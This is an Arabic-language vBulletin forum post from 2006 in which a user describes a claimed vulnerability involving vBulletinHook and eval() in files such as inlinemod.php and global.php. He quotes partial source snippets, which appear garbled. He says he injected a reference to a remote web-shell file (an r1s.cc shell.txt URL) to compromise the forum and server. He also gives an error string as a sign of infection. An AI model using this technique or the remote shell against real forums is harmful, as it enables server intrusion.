تراجع إلى الخلف   :: TRAIDNT FORUM :: > قسم تطوير المنتديات > ركن تطوير منتديات vb3.8.0 > ركن ثغرات النسخه الثالثه
اعادة تحديث هذه الصفحة ثغرة خطيرة جداً في نسخة برنامج الـvBulletin
التسجيل دعوة أصدقائك البحث مشاركات اليوم أعتبر مشاركات المنتدى مقروءة

ركن ثغرات النسخه الثالثه لجميع النسخ التاليه : [vB3.8.0] +[vB3.7.0] +[vB3.6.0] + [vB3.5.0] + [vB3.0.0] : هذا الركن لايقبل إضافة أي مشاركه

ثغرة خطيرة جداً في نسخة برنامج الـvBulletin

بسم الله الرحمن الرحيم .. السلام عليكم ورحمه الله وبركاته اليوم معنا ثغرة هي ليست بخطيره ولكنها أكثر من خطيرة أضعاف أضعاف ما تتوقعنا أنا

Like Tree1معجبون
  • 1 أضيفت بواسطة Cyb3rT

 
 
LinkBack
  #1  
قديمة 26 - 05 - 2006, 07:09 Cyb3rT غير متواجد حاليآ بالمنتدى
Banned
بيانات موقعي
اصدار المنتدى: منتج اخر
 







Cyb3rT سوف يصبح مبدعCyb3rT سوف يصبح مبدعCyb3rT سوف يصبح مبدعCyb3rT سوف يصبح مبدع
أرسل رسالة بواسطة ICQ إلى Cyb3rT أرسل رسالة بواسطة AIM إلى Cyb3rT أرسل رسالة بواسطة MSN إلى Cyb3rT أرسل رسالة بواسطة Yahoo إلى Cyb3rT أرسل رسالة بواسطة Skype™ إلى Cyb3rT
افتراضي
بسم الله الرحمن الرحيم ..



السلام عليكم ورحمه الله وبركاته



اليوم معنا ثغرة هي ليست بخطيره ولكنها أكثر من خطيرة أضعاف أضعاف ما تتوقعنا



أنا أخاطب فقط من يستخدم برنامج الــvBulletin



كنت أجلس علي جهازي الخاص . أقوم ببعض المحادثات مع أصدقائي علي الشبكة ..



جاء لي شخص صديقي وأحد فريق عملي ., LinuxHak قام بأرسال رابط موضوع لي.



كان علي هذا الرابط : http://www.swalif.net/softs/showthread.php?t=157342



كاتب الموضوع هو العندليب



الصراحة ما فهمت من الموضوع شىء . ولكن لثقتي بالعندليب قلت أبحث شوي في النسخه



بمجرد أن انتهيت من قرآة جزء من الموضوع ورأيته



يتحدث عن كلمتين وهما vBulletinHook



بالطبع لم اهتم لردود الشباب لأني علمت أنه سوف تكون عبارات شكر فقط



توجهت إلي منتدي وخذت باكب وبعدين توجهت اشوف الثغرة



قلت العندليب كان يتحدث عن قوالب فماذا عن الملفات؟؟



الملفات ايضا في البدايه مثال ملف index.php + image.php + faq.php



رأيت بداخلها .. هذه الكلمه vBulletinHook طيب الآن أنا في حيرة ...



آها تذكرت العندليب قال أن الثغرة في الداله eval يا حلاوة رحنا بلاش يلعنها داله



Example 1. eval() example - simple text merge





خلينا من كل هذا والإن لنري الملفات الجديدة التي تم أضافتها لنسخة برنامج الفيبلوتين



وهي inlinemod.php يا خطورة أمه سوف أسرد لكم الثغرة كيف تعمل



رمز PHP:
 /*======================================================================*\r

|| ####################################################################

|| # CVS: $RCSfile: inlinemod.php,v $ - $Revision: 1.47.2.9 $/*======================================================================*\r

|| ####################################################################

\*======================================================================*/

?> 


رمز PHP:
 // empty ******

set******('vbulletin_inlinepost'''TIMENOW 3600'/');

($hook vBulletinHook::fetch_hook('inlinemod_domoveposts')) ? eval($hook) : false


رمز PHP:
require_once('./global.php');

require_once(DIR '/includes/functions_editor.php');

require_once(DIR '/includes/functions_threadmanage.php');

require_once(DIR '/includes/functions_databuild.php');

require_once(DIR '/includes/functions_log_error.php'); 




لم نفهم شىء .. منك يا حسن ما فائدتها هذه التي اضفتها



يا أخواني الكرام كل ملف يعتمد بداخله هذه الكلمه vBulletinHook بأمكاننا وضع بعض الإكود ولن أسردها هنا



لأنه سوف تعتبر ثغرة وراح يخترب بيوت الناس منها ولن يصلح معها جدار ناري لأنها خارج



نطاق مجلد المنتدي فهل سنضع جدار ناري علي المجلد الرئيسي ؟ أن الثغرة في ملفات ..



global.php - inlinemod.php - cron.php وباقي الملفات الخارجيه





سوف اشرح لكم .. قمت بأضافه بعض الإكود التي يسمح لي برنامج الفيبلوتين بأضافتها عبر المتصفح



وبعدها أضفت هذا الكود http://www.r1s.cc/shell.txt? الإن تم رفع الشل عبرة هذه الثغرة



انتظر الصورة










ومنها تمكنا من أختراق المنتدي + أختراق السيرفير أن كان المخترق محترف شويه



الترقيه غير معلومة :ٍ للأسف



الإستثمار : حصريا

أحترامي للجميع : أخوكم حسن

RootR1s.cc


للعلم أخواني نسيت شىء

من يري هذه الأسطر بمنتداه بعد أضافه هذا الملف لمنتداه يكون منتداه مصاب

رمز PHP:
WarningDivision by zero in /includes/functions.php(4367) : eval()'d code on line 10 
www.r1s.cc/vb/inlinemod.php


مع مراعاه تغير الإسم لأسم موقعك

أحترامي وترايدنيت موفقه أن شاء الكريم لكن في شىء ثاني بدي أرجاعه ويا تركي اليوم أن شاء الله
LoVLy معجب بهذا.
 

العلامات المرجعية

« الموضوع السابق | الموضوع التالي »
أدوات الموضوع
طرق العرض
العرض العادي العرض العادي

ضوابط المشاركة
لا يمكنك اضافة مواضيع جديدة
لا يمكنك اضافة مشاركات
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك
رمز [IMG] : متاحة
رمز HTML : معطّلة
المراجع : معطّلة
Refbacks are متاحة



الساعة معتمدة بتوقيت جرينتش +3 . الساعة الآن : 05:19.
المعهد غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء
فعلى كل شخص تحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه
التعليقات المنشورة لا تعبر عن رأي معهد ترايدنت ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر)

إتصل بنا - :: TRAIDNT :: - الأرشيف - Privacy-Policy - اعلى

Powered by vBulletin® Version 3.8.7
.Copyright ©2000 - 2012, Jelsoft Enterprises Ltd

SEO by vBSEO 3.6.0 ©2011, Crawlability, Inc.